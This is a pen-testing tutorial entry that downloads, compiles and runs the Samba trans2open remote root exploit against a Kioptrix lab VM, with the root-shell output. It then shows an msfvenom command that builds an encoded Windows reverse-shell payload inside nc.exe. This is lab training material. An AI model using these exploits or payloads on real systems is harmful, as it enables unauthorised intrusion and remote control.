November 5, 2019 · Basic Pen-Testing

9.2 : Pre-exploitation - Compiling rootkits

Download and compile the trans2open exploit

Example exploit written in C (exploit-db entry 10, the Samba 2.2.8 trans2open remote root exploit). The compiled binary lands in the current directory, so it is run with ./ :

curl https://www.exploit-db.com/download/10 > 10.c
gcc 10.c -o trans2open
./trans2open -h

root@[hostname]:~/Desktop/exploits# ./trans2open -b 0 -v 192.168.56.103
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
id
uid=0(root) gid=0(root) groups=99(nobody)
^C

Example of a reverse shell payload, encoded with the x86/shikata_ga_nai encoder (an encoder, not encryption) and written into a copy of nc.exe used as the template (-x):

msfvenom -p windows/shell_reverse_tcp \
  LHOST=192.168.56.101 LPORT=4444 \
  -f exe -e x86/shikata_ga_nai \
  -x /usr/share/windows-binaries/nc.exe \
  -o shell3.exe